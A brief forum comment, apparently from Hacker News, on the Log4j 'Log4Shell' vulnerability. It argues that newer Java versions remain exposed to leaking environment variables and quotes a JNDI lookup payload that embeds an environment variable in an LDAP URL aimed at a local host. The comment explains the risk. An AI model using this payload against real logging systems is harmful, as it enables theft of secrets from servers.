|
|
|
|
|
by brasetvik
1655 days ago
|
|
> But one thing that I haven't seen mentioned enough is that this only affects pretty old versions of java. Recent versions were still susceptible to e.g. exfiltration of env vars, which may often contain secrets. ${jndi:ldap://127.0.0.1:1389/o=${env:PATH}} |
|